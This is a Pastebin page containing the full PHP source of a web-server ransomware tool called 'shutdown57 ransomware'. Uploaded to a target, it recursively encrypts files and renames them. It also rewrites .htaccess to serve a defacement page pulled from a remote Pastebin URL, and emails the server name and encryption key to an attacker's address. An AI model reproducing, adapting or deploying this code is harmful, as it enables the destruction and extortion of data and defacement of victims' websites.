Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /*
- * +--------------------------+
- * |shutdown57 ransomware 2018|
- * +--------------------------+
- *
- * SAVE WITH THE NAMEs57rsw.php
- * Note :: you must save or upload this file to the target with the file name "s57rsw.php", in order to be safe.
- * NOTE :: you must save or upload this file to the target with the file name "s57rsw.php", in order to be safe.
- */
- error_reporting(0);
- set_time_limit(0);
- ini_set('memory_limit', '-1');
- Class shutdown57_rsw{
- public $msg = "https://pastebin.com/raw/a8qaDbu7"; # URL yang akan mengubah tampilan , atau bisa di isi langsung dengan script base64.
- public $report_to = "indonesianpeople.shutdown57@gmail.com"; # report ransomware;
- public function __construct()
- {?> <!DOCTYPE html>
- <html>
- <head>
- <title>shutdown57 ransomware v2.</title>
- <meta charset="utf-8">
- <meta name="author" content="shutdown57">
- <meta name="description" content="shutdown57 ransomware">
- <style type="text/css">html,body{background: #000;color: #eee;text-align: center;}input,select{color: #eee;background: #000;padding: 6px;border:1px solid #f00;}a{color:#f00;text-decoration:none}a:hover{text-decoration: underline;color: #eee}</style>
- </head>
- <body><br/><br/><br/><br/><br/><br/>
- <fieldset style="max-width: 800px;margin: 0 auto;box-shadow: 0px 0px 20px #f00"><legend>shutdown57 ransomware V2</legend>
- <pre> _ _ _ ____ _____
- ___| |__ _ _| |_ __| | _____ ___ __ | ___|___ |
- / __| '_ \| | | | __/ _` |/ _ \ \ /\ / / '_ \|___ \ / /
- \__ \ | | | |_| | || (_| | (_) \ V V /| | | |___) |/ /
- |___/_| |_|\__,_|\__\__,_|\___/ \_/\_/ |_| |_|____//_/
- +
- +---- [ indonesianpeople.shutdown57@gmail.com ] ----+
- STATUS : <?=(is_writable($this->locate())) ? "<font color=lime>RANSOMABLE</font>" : "<font color=red>UNRANSOMABLE</font> on ";echo " on ".$this->locate()."<br>"; ?>
- S57RSW : <?=(file_exists('.hts57rsw')) ? "<font color=lime>THIS SERVER INFECTED S57RSW</font>" : "<font color=red>THIS SERVER STILL SECURE FROM S57RSW</font>";?>
- </pre><?php
- if(empty($_POST['opt']) && empty($_POST['key'])){
- ?>
- <form method="post">
- <label>Input key ::</label>
- <input type="text" name="key" placeholder="enter key" style="width: 250px" required="">
- <select name="opt">
- <option>- s57rsw -</option>
- <option value="e">encrypt</option>
- <option value="d">decrypt</option>
- </select>
- <input type="submit" value=">>">
- </form>
- <?php
- }else{
- echo "[ <a href='?'>Back </a>] <br>";
- $opt = $_POST['opt'];
- $key = $_POST['key'];
- switch ($opt) {
- case 'e':
- $this->s57runrsw($this->locate(),'e',$key);
- break;
- case 'd':
- $this->s57runrsw($this->locate(),'d',$key);
- break;
- }
- }
- ?> </fieldset>
- </body>
- </html><?php
- }
- public function s57init()
- {
- if(!file_exists('.hts57rsw'))
- {if(file_exists('.htaccess')){
- rename('.htaccess','.hts57rsw');
- }else{
- touch('.htaccess');
- rename('.htaccess','.hts57rsw');
- }
- $fp = fopen('.htaccess','w');
- $htc ="# shutdown57 ! [ encrypted at ".date('D , d M Y H:i:s')." ]\r\nDirectoryIndex shutdown57.php\r\nErrorDocument 404 /shutdown57.php";
- fwrite($fp,$htc);
- echo ".... Manipulating <i><b>.htaccess</b></i> DONE .... <br>";
- }
- if(preg_match("/^http/",$this->msg))
- {
- $msg = file_get_contents($this->msg);
- }else{
- $msg = base64_decode($this->msg);
- }
- if(file_put_contents('shutdown57.php',$msg))
- {
- echo ".... Manipulating <i><b>Index & Change display of page</b></i> DONE .... <br>";
- }
- }
- public function s57unit()
- {
- if(file_exists('.hts57rsw'))
- {
- if(unlink('.htaccess') && unlink('shutdown57.php'))
- {
- echo ".... Restore <i><b>.htaccess</b></i> DONE .... <br>";
- echo ".... Restore <i><b>Index files</b></i> DONE ....<br>";
- }
- rename('.hts57rsw','.htaccess');
- }
- }
- public function s57ended($npy,$method){
- switch ($method) {
- case 'e':
- rename($npy, $npy.".shutdown57");
- break;
- case 'd':
- $npys = str_replace(".shutdown57", "", $npy);
- rename($npy, $npys);
- break;
- }
- }
- public function enkontol($key,$pwd){
- $data = file_get_contents($pwd);
- $iv = mcrypt_create_iv(mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC),MCRYPT_DEV_URANDOM);
- $encrypted = base64_encode($iv.mcrypt_encrypt(MCRYPT_RIJNDAEL_128,hash('sha256',$key,true),$data,MCRYPT_MODE_CBC,$iv));
- if(file_put_contents($pwd,$encrypted )){
- echo "[<font color=lime>LOCKED</font>][".date('d:m:Y')."] => ".$pwd." <br>";
- }else{
- echo "[<font color=red>FAILED</font>][".date('d:m:Y')."] => ".$pwd." <br>";
- }
- }
- public function dekontol($key,$pwd){
- $data = base64_decode( file_get_contents($pwd) );
- $iv = substr($data, 0, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC));
- $decrypted = rtrim(mcrypt_decrypt(MCRYPT_RIJNDAEL_128,hash('sha256', $key, true),substr($data, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)),MCRYPT_MODE_CBC,$iv),"\0");
- if(file_put_contents($pwd, $decrypted )){
- echo "[<font color=lime>UNLOCKED</font>][".date('d:m:Y')."] => ".$pwd." <br>";
- }else{
- echo "[<font color=red>--FAILED</font>][".date('d:m:Y')."] => ".$pwd." <br>";
- }
- }
- public function kecuali($ext,$name){
- $re = "/({$name})/";
- preg_match($re, $ext, $matches);
- if($matches[1]){
- return false;
- }
- return true;
- }
- public function s57runrsw($dir,$method,$key)
- { switch ($method) {
- case 'e':
- $this->s57init();
- break;
- case 'd':
- $this->s57unit();
- break;
- }
- $s = scandir($dir);
- foreach($s as $d)
- {
- if($d!='.' && $d!='..')
- {
- $locate = $dir.DIRECTORY_SEPARATOR.$d;
- if(!is_dir($locate)){
- if($this->kecuali($locate,"s57rsw.php")&&
- $this->kecuali($locate,".png") &&
- $this->kecuali($locate,".htaccess") &&
- $this->kecuali($locate,"shutdown57.php") &&
- $this->kecuali($locate,"index.php") &&
- $this->kecuali($locate,".hts57rsw") ){
- switch ($method) {
- case 'e':
- $this->enkontol($key,$locate);
- $this->s57ended($locate,'e');
- break;
- case 'd':
- $this->dekontol($key,$locate);
- $this->s57ended($locate,'d');
- break;
- }
- }
- }else{
- $this->s57runrsw($locate,$method,$key);
- }
- }
- $this->plus();
- }
- $this->report($key);
- }
- public function report($key){
- $message.= "========= Report Ransomware =========\n";
- $message.= "Server : ".$_SERVER['HTTP_HOST']."\n";
- $message.= "Key : ".$key."\n";
- $message.= "Encrypted : ".date('D , d M Y H:i:s')."\n";
- $message.= "========= Indonesian (2018) Ransomware =========\n";
- $subject = "[RANSOMWARE][".$_SERVER['HTTP_HOST']."]";
- $headers = "From: s57rsw <ransomeware@shutdown57.today>\r\n";
- mail($this->report_to,$subject,$message,$headers);
- }
- public function plus(){
- flush();
- ob_flush();
- }
- public function locate(){
- return getcwd();
- }
- }
- new shutdown57_rsw();
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement